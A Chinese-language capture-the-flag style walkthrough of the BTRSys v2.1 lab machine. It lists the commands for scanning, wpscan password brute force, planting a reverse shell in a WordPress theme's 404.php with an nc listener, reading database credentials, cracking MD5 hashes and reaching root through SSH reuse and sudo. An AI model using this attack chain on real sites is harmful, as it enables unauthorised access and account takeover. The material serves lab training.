BTRSys: v2.1靶场渗透

https://www.vulnhub.com/entry/btrsys-v21,196/

https://portal.offsec.com/machine/btrsys21-114/overview/details

  1. 将两台虚拟机网络连接都改为NAT模式

  2. 攻击机上做namp局域网扫描发现靶机

    nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.155

  1. 对靶机进行端口服务探测

    nmap -sV -T4 -p- -A 192.168.23.155

  1. 访问 21 端口开放的 FTP 服务

    ftp 192.168.23.155

anonymous匿名登录成功,输入binary进入二进制模式

啥也没有,而且权限也不足以进行文件上传

  1. 再来看看网站

没有什么价值的默认网页,扫描其网站子目录看看

复制代码
gobuster dir -u http://192.168.23.155 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400
  1. 通过目录结构可以看到网站是 wordpress 建站,分别看看网页内容

http://192.168.23.155/robots.txt

http://192.168.23.155/wordpress/

扫描识别网站指纹目录

复制代码
whatweb -v http://192.168.23.155/wordpress/

得知了 WordPress[3.9.14]

  1. 使用专项 wordpress 扫描工具进行扫描

    wpscan --url http://192.168.23.155/wordpress/ --enumerate u

扫描发现 wordpress 存在两个用户:adminbtrisk

  1. 对收集的用户名进行爆破,字典选用/usr/share/wordlists/rockyou.txt

    gunzip /usr/share/wordlists/rockyou.txt.gz
    mousepad user.txt
    wpscan --url "http://192.168.23.155/wordpress/" -P "/usr/share/wordlists/rockyou.txt" --usernames user.txt

成功得到 wordpress 网站的账户密码

admin/admin

  1. 账号密码正确,成功登录进入 wordpress

在后台对wordpress 的主题进行编辑,在下述页面黏贴 kali 自带的反弹 shell 代码

http://192.168.23.155/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=72&updated=true

更新网站页面代码之后,访问 404.php 的网站页面触发反弹 shell

http://192.168.23.155/wordpress/wp-content/themes/twentyfourteen/404.php

  1. 注意 kali 在触发反弹 shell 之前就需要监听 4444 端口以 getshell

    nc -lvvp 4444

然后启动一个可交互式 shell,再进行信息收集操作

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'
id
uname -a
lsb_release -a
  1. 再信息收集一下,查看历史命令

    history

成功得到明文的数据库账户密码信息,登录成功

复制代码
mysql -uroot -prootpassword!
  1. 查看数据库,使用数据库wordpress

    show databases;
    use wordpress;

查看 wordpress数据库下 tables

复制代码
show tables;

查看 wp_users 表当中内容

复制代码
select * from wp_users;

btrisk/a318e4507e5a74604aafb45e4741edd3

admin/21232f297a57a5a743894a0e4a801fc3

将这个密码进行md5解密

https://pmd5.com/

得到 btrisk 用户的密码是roottoor

  1. 注意到 home 目录下存在 btrisk 目录,那么可以合理推测系统用户和网站用户同一个密码

    ssh btrisk@192.168.23.155

ssh 登录成功

  1. 看一下如何提权

    sudo -l
    sudo su

最后成功提权变成 root 用户

相关推荐
星幻元宇VR6 小时前
走进公共安全教育展厅|了解安全防范知识
学习·安全·虚拟现实
2501_940198697 小时前
从“数据孤岛”到“智慧医脑”:实战 MCP 协议安全接入 HIS 系统,构建医疗级 AI 辅助诊断合规中台
人工智能·安全·asp.net
上海云盾第一敬业销售7 小时前
高防CDN在网站安全性能提升中的架构解析
安全·ddos
不灭锦鲤8 小时前
每天看一种漏洞类型,oss存储桶
安全·web安全
Kaede69 小时前
排除网络故障需要做什么?查看网络故障的步骤
网络安全·云计算
周某人姓周9 小时前
sqlilabs靶场通关详解
数据库·mysql·安全·网络安全
程序员哈基耄11 小时前
浏览器文件格式转换工具:简单、安全、高效的文本与数据处理助手
python·安全·数据挖掘
安科瑞小许11 小时前
新能源并网中的“孤岛”与“逆流”:电力安全背后的防护技术解析
分布式·安全·能源·光伏·防逆流
阿里云云原生12 小时前
Nacos 生产级安全实践:精细化鉴权、灰度平滑过渡与全量操作审计
安全·阿里云·云原生·nacos
智慧医院运行管理解决方案专家13 小时前
当医院安全进入“自动驾驶”时代:AI机器人医院安全值守日记
人工智能·安全·自动驾驶